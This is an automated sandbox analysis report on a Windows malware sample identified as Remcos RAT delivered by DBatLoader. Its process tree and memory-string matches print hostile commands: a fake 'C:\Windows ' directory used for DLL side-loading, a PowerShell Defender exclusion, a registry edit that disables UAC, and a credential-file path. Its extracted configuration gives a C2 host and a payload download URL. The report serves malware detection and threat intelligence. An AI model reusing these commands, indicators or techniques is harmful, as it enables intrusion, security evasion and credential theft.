Edit tour

Windows Analysis Report
0vJrK0NCd1.exe

Overview

General Information

Sample Name:	0vJrK0NCd1.exe
Original Sample Name:	8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5.exe
Analysis ID:	1296068
MD5:	533b3df0e597c50e1129ec807fd6bbcf
SHA1:	0561fc6471cb5e2f0aa9e6b3e3fdfa9fd2586dbc
SHA256:	8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5
Tags:	exeRemcosRAT
Infos:

Detection

Remcos, DBatLoader, FloodFix

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Sigma detected: Remcos

Antivirus detection for dropped file

Found malware configuration

Yara detected FloodFix

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Antivirus / Scanner detection for submitted sample

Yara detected DBatLoader

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Machine Learning detection for sample

Allocates memory in foreign processes

DLL side loading technique detected

Adds a directory exclusion to Windows Defender

Drops executables to the windows directory (C:\Windows) and starts them

Installs a global keyboard hook

Drops PE files with a suspicious file extension

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

PE file contains more sections than normal

Yara detected Keylogger Generic

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Deletes files inside the Windows folder

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Detected TCP or UDP traffic on non-standard ports

Classification

Process Tree

System is w10x64

0vJrK0NCd1.exe (PID: 6460 cmdline: C:\Users\user\Desktop\0vJrK0NCd1.exe MD5: 533B3DF0E597C50E1129EC807FD6BBCF)

cmd.exe (PID: 5296 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 2280 cmdline: cmd.exe /c mkdir "\\?\C:\Windows " MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6188 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cmd.exe (PID: 6216 cmdline: cmd.exe /c ECHO F MD5: F3BDBE3BB6F734E357235F4D5898582D)

xcopy.exe (PID: 6260 cmdline: xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

cmd.exe (PID: 6308 cmdline: cmd.exe /c ECHO F MD5: F3BDBE3BB6F734E357235F4D5898582D)

xcopy.exe (PID: 6332 cmdline: xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

cmd.exe (PID: 6384 cmdline: cmd.exe /c ECHO F MD5: F3BDBE3BB6F734E357235F4D5898582D)

xcopy.exe (PID: 6428 cmdline: xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y MD5: 9F3712DDC0D7FE3D75B8A06C6EE8E68C)

easinvoker.exe (PID: 6500 cmdline: C:\Windows \System32\easinvoker.exe MD5: 231CE1E1D7D98B44371FFFF407D68B59)

cmd.exe (PID: 6548 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6668 cmdline: cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

powershell.exe (PID: 6728 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

PING.EXE (PID: 6740 cmdline: ping 127.0.0.1 -n 6 MD5: 70C24A306F768936563ABDADB9CA9108)

colorcpl.exe (PID: 6224 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)

Elpuxpki.PIF (PID: 3436 cmdline: "C:\Users\Public\Libraries\Elpuxpki.PIF" MD5: 533B3DF0E597C50E1129EC807FD6BBCF)

SndVol.exe (PID: 5180 cmdline: C:\Windows\System32\SndVol.exe MD5: 1EF1A9B89A984DD25DB61DC1AF2548B8)

Elpuxpki.PIF (PID: 4672 cmdline: "C:\Users\Public\Libraries\Elpuxpki.PIF" MD5: 533B3DF0E597C50E1129EC807FD6BBCF)

colorcpl.exe (PID: 5372 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://malcat.fr/blog/exploit-steganography-and-delphi-unpacking-dbatloader/ https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader https://news.sophos.com/en-us/2020/09/24/email-delivered-modi-rat-attack-pastes-powershell-commands https://www.netskope.com/blog/dbatloader-abusing-discord-to-deliver-warzone-rat	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "lart.ydns.eu:1984:1", "Assigned name": "Greatzillart", "Copy file": "remcos.exe", "Mutex": "Rmc-QBZ2IM", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Threatname: DBatLoader

{"Download Url": "https://balkancelikdovme.com/work/Elpuxpkilck"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
0vJrK0NCd1.exe	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files\Common Files\system\symsrv.dll	JoeSecurity_FloodFix	Yara detected FloodFix	Joe Security
C:\Program Files\Common Files\system\symsrv.dll	MALWARE_Win_FloodFix	Detects FloodFix	ditekSHen
C:\Program Files\Common Files\system\symsrv.dll	MAL_Floxif_Generic	Detects Floxif Malware	Florian Roth
C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp	Malware_Floxif_mpsvc_dll	Malware - Floxif	Florian Roth	0x8068:$op1: 04 80 7A 03 01 75 04 8D 42 04 C3 8D 42 04 53 8B 0x8088:$op2: 88 19 74 03 41 EB EA C6 42 03 01 5B C3 8B 4C 24 0x97ec:$op3: FF 03 8D 00 F9 FF FF 88 01 EB A1 0x9854:$op3: FF 03 8D 00 F9 FF FF 88 01 EB A1
C:\Users\Public\Libraries\Elpuxpki.PIF	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4c0:$a1: Remcos restarted by watchdog! 0x6ca38:$a3: %02i:%02i:%02i:%03i
00000026.00000002.564309116.0000000000608000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000001D.00000002.636155790.0000000002E00000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000023.00000002.532580760.0000000003300000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x819f4:$a1: Remcos restarted by watchdog! 0x81f6c:$a3: %02i:%02i:%02i:%03i
00000023.00000002.532520297.0000000000487000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001D.00000002.637978823.0000000014C28000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000026.00000002.564661201.0000000002B50000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
Process Memory Space: 0vJrK0NCd1.exe PID: 6460	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: 0vJrK0NCd1.exe PID: 6460	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: 0vJrK0NCd1.exe PID: 6460	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: 0vJrK0NCd1.exe PID: 6460	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x161e06:$a1: Remcos restarted by watchdog! 0xb2ace6:$a1: Remcos restarted by watchdog! 0x162360:$a3: %02i:%02i:%02i:%03i 0x16278f:$a3: %02i:%02i:%02i:%03i 0xb2b240:$a3: %02i:%02i:%02i:%03i 0xb2b66f:$a3: %02i:%02i:%02i:%03i
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
35.2.SndVol.exe.3300000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.2.SndVol.exe.3300000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.2.SndVol.exe.3300000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x657e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6577c:$s1: CoGetObject 0x65790:$s1: CoGetObject 0x657ac:$s1: CoGetObject 0x6f738:$s1: CoGetObject 0x6573c:$s2: Elevation:Administrator!new:
35.2.SndVol.exe.3300000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b8a8:$a1: Remcos restarted by watchdog! 0x6be20:$a3: %02i:%02i:%02i:%03i
35.2.SndVol.exe.3300000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x658fc:$str_a1: C:\Windows\System32\cmd.exe 0x65878:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65878:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65d78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x665a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6596c:$str_b2: Executing file: 0x669ec:$str_b3: GetDirectListeningPort 0x66398:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66518:$str_b7: \update.vbs 0x65994:$str_b9: Downloaded file: 0x65980:$str_b10: Downloading file: 0x65a24:$str_b12: Failed to upload file: 0x669b4:$str_b13: StartForward 0x669d4:$str_b14: StopForward 0x66470:$str_b15: fso.DeleteFile " 0x66404:$str_b16: On Error Resume Next 0x664a0:$str_b17: fso.DeleteFolder " 0x65a14:$str_b18: Uploaded file: 0x659d4:$str_b19: Unable to delete: 0x66438:$str_b20: while fso.FileExists(" 0x65eb1:$str_c0: [Firefox StoredLogins not found]
29.2.colorcpl.exe.2e00000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
29.2.colorcpl.exe.2e00000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
29.2.colorcpl.exe.2e00000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x657e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6577c:$s1: CoGetObject 0x65790:$s1: CoGetObject 0x657ac:$s1: CoGetObject 0x6f738:$s1: CoGetObject 0x6573c:$s2: Elevation:Administrator!new:
29.2.colorcpl.exe.2e00000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b8a8:$a1: Remcos restarted by watchdog! 0x6be20:$a3: %02i:%02i:%02i:%03i
29.2.colorcpl.exe.2e00000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x658fc:$str_a1: C:\Windows\System32\cmd.exe 0x65878:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65878:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65d78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x665a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6596c:$str_b2: Executing file: 0x669ec:$str_b3: GetDirectListeningPort 0x66398:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66518:$str_b7: \update.vbs 0x65994:$str_b9: Downloaded file: 0x65980:$str_b10: Downloading file: 0x65a24:$str_b12: Failed to upload file: 0x669b4:$str_b13: StartForward 0x669d4:$str_b14: StopForward 0x66470:$str_b15: fso.DeleteFile " 0x66404:$str_b16: On Error Resume Next 0x664a0:$str_b17: fso.DeleteFolder " 0x65a14:$str_b18: Uploaded file: 0x659d4:$str_b19: Unable to delete: 0x66438:$str_b20: while fso.FileExists(" 0x65eb1:$str_c0: [Firefox StoredLogins not found]
38.2.colorcpl.exe.2b50000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
38.2.colorcpl.exe.2b50000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
38.2.colorcpl.exe.2b50000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
38.2.colorcpl.exe.2b50000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
38.2.colorcpl.exe.2b50000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
29.2.colorcpl.exe.2e00000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
29.2.colorcpl.exe.2e00000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
29.2.colorcpl.exe.2e00000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
29.2.colorcpl.exe.2e00000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
29.2.colorcpl.exe.2e00000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0.2.0vJrK0NCd1.exe.10030000.8.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.0vJrK0NCd1.exe.10030000.8.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.0vJrK0NCd1.exe.10030000.8.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0.2.0vJrK0NCd1.exe.10030000.8.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.2.0vJrK0NCd1.exe.10030000.8.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0xa3034:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xa2fc8:$s1: CoGetObject 0xa2fdc:$s1: CoGetObject 0xa2ff8:$s1: CoGetObject 0xacf84:$s1: CoGetObject 0xa2f88:$s2: Elevation:Administrator!new:
0.2.0vJrK0NCd1.exe.10030000.8.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xa90f4:$a1: Remcos restarted by watchdog! 0xa966c:$a3: %02i:%02i:%02i:%03i
0.2.0vJrK0NCd1.exe.10000000.7.unpack	JoeSecurity_FloodFix	Yara detected FloodFix	Joe Security
0.2.0vJrK0NCd1.exe.10000000.7.unpack	MALWARE_Win_FloodFix	Detects FloodFix	ditekSHen
0.2.0vJrK0NCd1.exe.10000000.7.unpack	MAL_Floxif_Generic	Detects Floxif Malware	Florian Roth
32.2.Elpuxpki.PIF.2e2056c.0.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
